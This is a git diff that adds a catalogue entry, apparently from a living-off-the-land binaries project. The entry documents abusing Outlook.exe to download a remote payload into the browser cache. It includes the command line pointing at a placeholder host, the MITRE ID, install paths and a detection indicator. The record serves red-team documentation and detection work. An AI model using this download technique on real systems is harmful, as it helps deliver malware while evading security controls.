diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml
new file mode 100644
index 0000000..a7efcf3
--- /dev/null
+++ b/yml/OtherMSBinaries/Outlook.yml
@@ -0,0 +1,34 @@
+---
+Name: Outlook.exe
+Description: Microsoft Office component
+Author: Nir Chako
+Created: 2022-11-08
+Commands:
+  - Command: Outlook.exe https://example.com/payload
+    Description: Downloads payload from remote server
+    Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+Detection:
+  - IOC: Suspicious Office application internet/network traffic
+Acknowledgement:
+  - Person: Nir Chako (Pentera)
+    Handle: '@C_h4ck_0'